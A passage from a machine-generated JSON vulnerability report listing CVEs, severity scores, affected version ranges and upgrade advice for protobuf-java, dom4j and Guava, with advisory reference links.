## Severity [CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171) Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication) ## Remediation and Mitigation Please update to the latest available versions of the following packages: protobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3) google-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]},"references":[{"summary":"GitHub Advisory GHSA-h4h5-3hr4-j3g2","url":"https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2"},{"summary":"CVE Record","url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBAUKJQL6O4TIWYBENORSY5P43TVB4M3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPCGUT3T5L6C3IDWUPSUO22QDCGQKTOP"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3171"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3171"},{"summary":"Gentoo Advisory 
glsa-202301-09","url":"https://security.gentoo.org/glsa/202301-09"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"ADJACENT_NETWORK","availabilityImpact":"HIGH","baseScore":5.7,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.7,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"ADJACENT_NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.7,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3171/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22569"]}],"cve":"CVE-2021-22569","cwe":{"id":"696","name":"Incorrect Behavior Order"},"discovery_date":"2022-01-07T22:31:44","ids":[{"system_name":"CVE Record","text":"CVE-2021-22569"},{"system_name":"GitHub Advisory","text":"GHSA-wrvw-hg22-4m67"},{"system_name":"Google Advisory","text":"bulletins"},{"system_name":"Oracle Advisory","text":"cpuapr2022"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"A potential Denial of Service issue in protobuf-java"},{"category":"details","details":"Vulnerability Details","text":"# A potential Denial of Service issue in protobuf-java ## Summary A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data. Reporter: [OSS-Fuzz](https://github.com/google/oss-fuzz) Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. 
Protobuf \"javalite\" users (typically Android) are not affected. ## Severity [CVE-2021-22569](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22569) **High** - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses. ## Proof of Concept For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness. ## Remediation and Mitigation Please update to the latest available versions of the following packages: - protobuf-java (3.16.1, 3.18.2, 3.19.2) - protobuf-kotlin (3.18.2, 3.19.2) - google-protobuf [JRuby gem only] (3.19.2)"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/01/12/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/01/12/7"},{"summary":"Google Advisory bulletins","url":"https://cloud.google.com/support/bulletins#gcp-2022-001"},{"summary":"GitHub Advisory GHSA-wrvw-hg22-4m67","url":"https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22569"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22569"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2021-22569/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10683"]}],"cve":"CVE-2020-10683","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2020-06-05T16:13:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-10683"},{"system_name":"Owasp Advisory","text":"XML_External_Entity_Prevention_Cheat_Sheet"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200518-0002"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1694235"}],"notes":[{"category":"description","details":"Vulnerability 
Description","text":"dom4j allows External Entities by default which might enable XXE attacks"},{"category":"details","details":"Vulnerability Details","text":"# dom4j allows External Entities by default which might enable XXE attacks dom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. Note: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended."}],"product_status":{"known_affected":["org.dom4j/dom4j@vers:maven/>=2.1.0|<2.1.3"],"known_not_affected":["org.dom4j/dom4j@2.1.3"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1694235"},{"summary":"Owasp Advisory XML_External_Entity_Prevention_Cheat_Sheet","url":"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"NetApp Advisory ntap-20200518-0002","url":"https://security.netapp.com/advisory/ntap-20200518-0002"},{"summary":"Oracle Advisory 
cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.dom4j/dom4j@vers:maven/>=2.1.0|<2.1.3"]}],"title":"CVE-2020-10683/pkg:maven/org.dom4j/dom4j@2.1.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-8908"]}],"cve":"CVE-2020-8908","cwe":{"id":"173","name":"Improper Handling of Alternate Encoding"},"discovery_date":"2021-03-25T17:04:19","ids":[{"system_name":"CVE Record","text":"CVE-2020-8908"},{"system_name":"Snyk 
Advisory","text":"SNYK-JAVA-COMGOOGLEGUAVA-1015415"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0003"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Sensitive Information to an Unauthorized Actor","title":"Additional CWE: 200"},{"audience":"developers","category":"other","text":"Creation of Temporary File With Insecure Permissions","title":"Additional CWE: 378"},{"audience":"developers","category":"other","text":"Incorrect Permission Assignment for Critical Resource","title":"Additional CWE: 732"},{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Guava"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Guava A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method. 
## Related CVE(s) CVE-2020-8908, SNYK-JAVA-COMGOOGLEGUAVA-1015415"}],"product_status":{"known_affected":["com.google.guava/guava@vers:maven/>=0.0.0|<32.0.0-android"],"known_not_affected":["com.google.guava/guava@32.0.0-android"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21%40%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21@%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r037fed1d0ebde50c9caf8d99815db3093c344c3f651c5a49a09824ce@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e%40%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e@%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748%40%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6%40%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6@%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27%40%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27@%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac%40%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac@%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222%40%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222@%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c%40%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba%40%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322%40%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf%40%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf@%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f%40%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95%40%3Cgithub.arrow.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5%40%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf%40%3Cdev.pig.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf@%3Cdev.pig.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e%40%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e@%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594%40%3Cdev.myfaces.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594@%3Cdev.myfaces.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8908"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8908"},{"summary":"NetApp Advisory ntap-20220210-0003","url":"https://security.netapp.com/advisory/ntap-20220210-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMGOOGLEGUAVA-1015415","url":"https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEGUAVA-1015415"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":3.3,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.3,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":3.3,"temporalSeverity":"LOW","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["com.google.guava/guava@vers:maven/>=0.0.0|<32.0.0-android"]}],"title":"CVE-2020-8908/pkg:maven/com.google.guava/guava@23.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-2976"]}],"cve":"CVE-2023-2976","cwe":{"id":"379","name":"Creation of Temporary File in Directory with Insecure Permissions"},"discovery_date":"2023-06-14T18:30:38","ids":[{"system_name":"CVE Record","text":"CVE-2023-2976"},{"system_name":"Intel Advisory","text":"intel-sa-01006"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0008"}],"notes":[{"audience":"developers","category":"other","text":"Files or Directories Accessible to External Parties","title":"Additional CWE: 552"},{"category":"description","details":"Vulnerability Description","text":"Guava vulnerable to insecure use of temporary directory"},{"category":"details","details":"Vulnerability Details","text":"# Guava vulnerable to insecure use of temporary directory Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the 
default Java temporary directory to be able to access the files created by the class. Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows."}],"product_status":{"known_affected":["com.google.guava/guava@vers:maven/>=1.0|<32.0.0-android"],"known_not_affected":["com.google.guava/guava@32.0.0-android"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-2976"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-2976"},{"summary":"NetApp Advisory ntap-20230818-0008","url":"https://security.netapp.com/advisory/ntap-20230818-0008"},{"summary":"Intel Advisory intel-sa-01006","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01006.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["com.google.guava/guava@vers:maven/>=1.0|<32.0.0-android"]}],"title":"CVE-2023-2976/pkg:maven/com.google.guava/guava@23.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13956"]}],"cve":"CVE